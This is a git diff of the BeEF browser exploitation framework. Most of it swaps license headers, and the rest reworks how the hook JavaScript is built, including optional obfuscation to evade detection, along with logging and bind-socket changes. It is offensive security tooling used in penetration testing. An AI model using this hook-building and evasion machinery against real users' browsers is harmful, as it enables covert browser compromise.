# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/constants/distributedengine.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/constants/hardware.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/constants/os.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/crypto.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/distributed_engine/models/rules.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/handlers/browserdetails.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/handlers/commands.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/handlers/hookedbrowsers.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

255
core/main/handlers/modules/beefjs.rb
View File

@@ -1,139 +1,154 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Handlers
module Modules
module Core
module Handlers
module Modules
# @note Purpose: avoid rewriting several times the same code.
module BeEFJS
# @note Purpose: avoid rewriting several times the same code.
module BeEFJS
# Builds the default beefjs library (all default components of the library).
# @param [Object] req_host The request object
def build_beefjs!(req_host)
config = BeEF::Core::Configuration.instance
# @note set up values required to construct beefjs
beefjs = ''
# @note location of sub files
beefjs_path = "#{$root_dir}/core/main/client/"
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
# Builds the default beefjs library (all default components of the library).
# @param [Object] req_host The request object
def build_beefjs!(req_host)
config = BeEF::Core::Configuration.instance
# @note set up values required to construct beefjs
beef_js = ''
# @note location of sub files
beef_js_path = "#{$root_dir}/core/main/client/"
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js)
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
# @note Load websocket library only if WS server is enabled in config.yaml
if config.get("beef.http.websocket.enable") == false
# @note BeEF libraries: need Eruby evaluation and obfuscation #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
else #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
end
end
ext_js_to_obfuscate = ''
ext_js_to_not_obfuscate = ''
# @note construct the beefjs string from file(s)
js_sub_files.each {|js_sub_file_name|
js_sub_file_abs_path = beefjs_path + js_sub_file_name
beefjs << (File.read(js_sub_file_abs_path) + "\n\n")
}
# @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
# @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
ext_js_sub_files.each{ |ext_js_sub_file|
if config.get("beef.extension.evasion.enable")
if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
# do not obfuscate the file
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
else
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
end
else
# Evasion is not enabled, do not obfuscate anything
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
end
}
# @note create the config for the hooked browser session
# @note construct the beef_js string from file(s)
beef_js_sub_files.each { |beef_js_sub_file|
beef_js_sub_file_path = beef_js_path + beef_js_sub_file
beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
}
hook_session_name = config.get('beef.http.hook_session_name')
hook_session_config = BeEF::Core::Server.instance.to_h
# @note create the config for the hooked browser session
hook_session_config = BeEF::Core::Server.instance.to_h
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
end
end
end
# @note Set some WebSocket properties
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
end
# @note populate place holders in the beef_js string and set the response body
eruby = Erubis::FastEruby.new(beef_js)
@hook = eruby.evaluate(hook_session_config)
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end
# @note Return the final hook to be sent to the browser
@body << @final_hook
end
# Finds the path to js components
# @param [String] component Name of component
# @return [String|Boolean] Returns false if path was not found, otherwise returns component path
def find_beefjs_component_path(component)
component_path = component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
return false if not File.exists? component_path
component_path
end
# Builds missing beefjs components.
# @param [Array] beefjs_components An array of component names
def build_missing_beefjs_components(beefjs_components)
# @note verifies that @beef_js_cmps is not nil to avoid bugs
@beef_js_cmps = '' if @beef_js_cmps.nil?
if beefjs_components.is_a? String
beefjs_components_path = find_beefjs_component_path(beefjs_components)
raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
beefjs_components = {beefjs_components => beefjs_components_path}
end
beefjs_components.keys.each { |k|
next if @beef_js_cmps.include? beefjs_components[k]
# @note path to the component
component_path = beefjs_components[k]
# @note we output the component to the hooked browser
@body << File.read(component_path)+"\n\n"
# @note finally we add the component to the list of components already generated so it does not get generated numerous times.
if @beef_js_cmps.eql? ''
@beef_js_cmps = component_path
else
@beef_js_cmps += ",#{component_path}"
end
}
end
end
end
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
end
# @note populate place holders in the beefjs string and set the response body
eruby = Erubis::FastEruby.new(beefjs)
@hook = eruby.evaluate(hook_session_config)
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
end
@body << @hook
end
# Finds the path to js components
# @param [String] component Name of component
# @return [String|Boolean] Returns false if path was not found, otherwise returns component path
def find_beefjs_component_path(component)
component_path = component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
return false if not File.exists? component_path
component_path
end
# Builds missing beefjs components.
# @param [Array] beefjs_components An array of component names
def build_missing_beefjs_components(beefjs_components)
# @note verifies that @beef_js_cmps is not nil to avoid bugs
@beef_js_cmps = '' if @beef_js_cmps.nil?
if beefjs_components.is_a? String
beefjs_components_path = find_beefjs_component_path(beefjs_components)
raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
beefjs_components = {beefjs_components => beefjs_components_path}
end
beefjs_components.keys.each {|k|
next if @beef_js_cmps.include? beefjs_components[k]
# @note path to the component
component_path = beefjs_components[k]
# @note we output the component to the hooked browser
@body << File.read(component_path)+"\n\n"
# @note finally we add the component to the list of components already generated so it does not get generated numerous times.
if @beef_js_cmps.eql? ''
@beef_js_cmps = component_path
else
@beef_js_cmps += ",#{component_path}"
end
}
end
end
end
end
end
end

32
core/main/handlers/modules/command.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -61,19 +51,11 @@ module BeEF
#todo antisnatchor: remove this gsub crap adding some hook packing.
if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
#content = command_module.output.gsub('//
#// Copyright 2012 Wade Alcorn wade@bindshell.net
#//
#// Licensed under the Apache License, Version 2.0 (the "License");
#// you may not use this file except in compliance with the License.
#// You may obtain a copy of the License at
#// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
#// Browser Exploitation Framework (BeEF) - http://beefproject.com
#// See the file 'doc/COPYING' for copying permission
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in writing, software
#// distributed under the License is distributed on an "AS IS" BASIS,
#// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#// See the License for the specific language governing permissions and
#// limitations under the License.
#//', "")
ws.send(@output, hooked_browser.session)
else
@@ -82,7 +64,7 @@ module BeEF
# @note prints the event to the console
if BeEF::Settings.console?
name = command_module.friendlyname || kclass
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module '#{name}'"
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']"
end
# @note flag that the command has been sent to the hooked browser

16
core/main/logger.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/migration.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/models/browserdetails.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

20
core/main/models/command.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -65,11 +55,11 @@ module Models
command.save
# @note log that the result was returned
BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
# @note prints the event into the console
if BeEF::Settings.console?
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module '#{command_friendly_name}'"
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
end
end

16
core/main/models/commandmodule.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/hookedbrowser.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/log.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/optioncache.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/result.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/user.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/network_stack/api.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

53
core/main/network_stack/assethandler.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -63,7 +53,7 @@ module Handlers
# use it like: bind_socket("irc","0.0.0.0",6667)
def bind_socket(name, host, port)
if @sockets[name] != nil
print_error "Thread [#{name}] is already listening on [#{host}:#{port}]."
print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]."
else
t = Thread.new {
server = TCPServer.new(host,port)
@@ -71,24 +61,47 @@ module Handlers
Thread.start(server.accept) do |client|
data = ""
recv_length = 1024
threshold = 1024 * 512
while (tmp = client.recv(recv_length))
data += tmp
break if tmp.length < recv_length || tmp.length == recv_length
# 512 KB max of incoming data
break if data > threshold
end
if data.size > threshold
print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved."
else
@sockets[name] = {'thread' => t, 'data' => data}
print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data."
print_debug "Bind Socket [#{name}] received:\n#{data}"
end
client.close
print_debug "Bind Socket on Thread [#{name}] received:\n#{data}"
end
end
}
@sockets[name] = t
print_info "Thread [#{name}] listening on [#{host}:#{port}]."
print_info "Bind socket [#{name}] listening on [#{host}:#{port}]."
end
end
def get_socket_data(name)
data = nil
if @sockets[name] != nil
data = @sockets[name]['data']
else
print_error "Bind Socket [#{name}] does not exists."
end
data
end
def unbind_socket(name)
t = @sockets[name]
Thread.kill(t)
print_info "Thread [#{name}] killed."
t = @sockets[name]['thread']
if t.alive?
print_debug "Thread to be killed: #{t}"
Thread.kill(t)
print_info "Bind Socket [#{name}] killed."
else
print_info "Bind Socket [#{name}] ALREADY killed."
end
end
# Builds a URL based on the path and extension, if neither are passed a random URL will be generated

16
core/main/network_stack/handlers/dynamicreconstruction.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

166
core/main/network_stack/websocket/websocket.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -27,17 +17,156 @@ module BeEF
@@activeSocket= Hash.new
@@lastalive= Hash.new
@@config = BeEF::Core::Configuration.instance
#@@wsopt=nil
MOUNTS = BeEF::Core::Server.instance.mounts
def initialize
port = @@config.get("beef.http.websocket.port")
secure = @@config.get("beef.http.websocket.secure")
@root_dir = File.expand_path('../../../../../', __FILE__)
if (secure)
ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
:tls_options => {
